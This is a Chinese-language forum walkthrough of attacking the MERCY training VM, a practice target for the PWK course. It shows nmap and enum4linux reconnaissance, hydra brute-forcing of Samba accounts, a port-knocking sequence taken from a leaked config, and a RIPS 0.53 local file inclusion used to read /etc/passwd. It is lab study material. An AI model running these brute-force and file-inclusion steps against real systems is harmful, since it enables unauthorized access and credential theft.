taibeihacker
Moderator
0x01 前言
MERCY是一個致力於PWK課程安全的靶機系統。 MERCY是一款遊戲名稱,與易受攻擊的靶機名稱無關。本次實驗是攻擊目標靶機獲取root權限並讀系統目錄中的proof.txt信息靶機的下載地址:
0x02 信息收集
1.存活主机扫描
root@kali2018:~#arp-scan -l
發現192.168.1.12就是目標靶機系統
2.端口扫描
通過NAMP對目標靶機進行端口掃描root@kali2018:~# nmap -A192.168.1.12
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 09:55 EST
Nmap scan report for 192.168.1.12
Host is up (0.00091s latency).
Not shown: 990 closed ports
PORT STATESERVICE VERSION
22/tcp filtered ssh
53/tcp opendomain ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp filtered http
110/tcp openpop3?
139/tcp opennetbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp openimap Dovecot imapd
|_ssl-date: TLS randomness does not represent time
445/tcp opennetbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp openssl/imap Dovecot imapd
|_imap-capabilities: CAPABILITY
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after: 2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
995/tcp openssl/pop3s?
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after: 2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:91:A0:C6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: mercy
| NetBIOS computer name: MERCY\x00
| Domain name: \x00
| FQDN: mercy
|_ System time: 2019-02-12T22:57:54+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-02-12 09:57:54
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.91 ms 192.168.1.12
OS and Service detection performed. Please report any incorrec
發現目標端口445,8080等端口開放.其他如22,80被防火牆阻斷.其中samba服務已開啟(這是本文重點滲透目標)
0x03漏洞利用
無論在任何情況下,我們首先攻擊的應用目標是ApacheTomcat(http://192.168.1.12:8080/)
嘗試訪問tomcat後台管理頁面,但需要輸入正確的用戶名和密碼方可登陸。嘗試輸入各種已知的信息但還是無法進入。注意到其用戶的配置信息在/etc/tomcat7/tomcat-users.xml中。
1.Samba漏洞攻击
通過smbclient命令列出目標靶機中可用的Samba服務共享名.root@kali2018:~# smbclient -NL 192.168.1.12
可從上圖中看到共享的幾個名稱,下面將掛載其共享目錄到本地,但還是不允許訪問目標共享,這裡需身份認證。
root@kali2018:~# mkdir /mnt/file
root@kali2018:~# mount -tcifs 192.168.1.12:/qiu /mnt/file
2.enum4linux枚举Samba账号
root@kali2018:~# enum4linux -U -o 192.168.1.12
讓我們將枚舉出來的賬號(qiu和pleadformercy)添加到mercy.txt中,並對其賬號進行爆破。
3.samba账号爆破
root@kali2018:~#hydra -L mercy.txt -P/usr/share/wordlists/fasttrack.txt smb://192.168.1.12:139
可發現成功爆破出qiu的賬號,密碼為空
4.mount命令挂载目录
root@kali2018:~#mount -t cifs//192.168.1.12:/qiu/mnt/file -o username=qiu
列出掛載目錄下的文件信息
5.private目录信息收集
發現.private目錄提供了一些重要係統信息root@kali2018:~# cd /mnt/file/
root@kali2018:/mnt/file# cd .private
root@kali2018:/mnt/file/.private# ls
opensesame readme.txtsecrets
root@kali2018:/mnt/file/.private# cd opensesame/
root@kali2018:/mnt/file/.private/opensesame# ls
config configprint
root@kali2018:/mnt/file/.private/opensesame# head -30 config
Here are settings for your perusal.
Port Knocking Daemon Configuration
[options]
UseSyslog
[openHTTP]
sequence=159,27391,4
seq_timeout=100
command=/sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags=syn
[closeHTTP]
sequence=4,27391,159
seq_timeout=100
command=/sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags=syn
[openSSH]
sequence=17301,28504,9999
seq_timeout=100
command=/sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags=syn
[closeSSH]
sequence=9999,28504,17301
seq_timeout=100
command=/sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags=syn
上面顯示了端口啟動守護進程的防火牆端口開放的命令配置.
6.打开目标靶机防火墙端口
看到兩組sequence,一組用於HTTP,另一組用於SSH。(1)http的sequence脚本:kncok.sh
#!/bin/bash
for PORT in 159 27391 4;do nmap -Pn 192.168.1.12 -p $PORT;
done
(2)SSH的sequence脚本:kncok1.sh
#!/bin/bash
for PORT in 17301 28504 9999;do nmap -Pn 192.168.1.12 -p $PORT;
done
(3)通过sequence脚本来打开HTTP的端口root@kali2018:~# ./knoch.sh
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST
Nmap scan report for 192.168.1.12
Host is up (0.00044s latency).
PORT STATESERVICE
159/tcp closed nss-routing
MAC Address: 00:0C:29:91:A0:C6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST
Nmap scan report for 192.168.1.12
Host is up (0.00053s latency).
PORT STATE SERVICE
27391/tcp closed unknown
MAC Address: 00:0C:29:91:A0:C6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST
Nmap scan report for 192.168.1.12
Host is up (0.00042s latency).
PORT STATESERVICE
4/tcp closed unknown
MAC Address: 00:0C:29:91:A0:C6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
(4)通过sequence脚本来打开SSH的端口root@kali2018:~# ./knoch1.sh
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST
Nmap scan report for 192.168.1.12
Host is up (0.00049s latency).
PORT STATESERVICE
17301/tcp closed unknown
MAC Address: 00:0C:29:91:A0:C6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST
Nmap scan report for 192.168.1.12
Host is up (0.00042s latency).
PORT STATESERVICE
28504/tcp closed unknown
MAC Address: 00:0C:29:91:A0:C6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST
Nmap scan report for 192.168.1.12
Host is up (0.00031s latency).
PORT STATESERVICE
9999/tcp closed abyss
MAC Address: 00:0C:29:91:A0:C6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
通過以上命令開放了80和22端口,現在在kali系統下打開80端口網站。
7.目录扫描
通過目錄工具dirb對目標靶機系統80端口網站進行掃描,發現存在robots.txt文件root@kali2018:~# dirb http://192.168.1.12
打開robots.txt的連接地址,發現一個有趣的目錄/omercy
打開該目錄網站,可發現RIPS 0.53版本存在
8.RIPS漏洞收集
根據EDB-ID18660,RIPS 0.53易受本地文件包含(LFI)漏洞影響。 (RIPS 0.53 LFI)在exploit-db 中搜索RIPS 0.53 漏洞。
RIPS 0.53 - Multiple Local File Inclusions
RIPS 0.53 - Multiple Local File Inclusions. CVE-80531CVE-80530 . webapps exploit for PHP platform
其PoC為:
可以本地文件包含讀出目標靶機的/etc/passwd的信息。
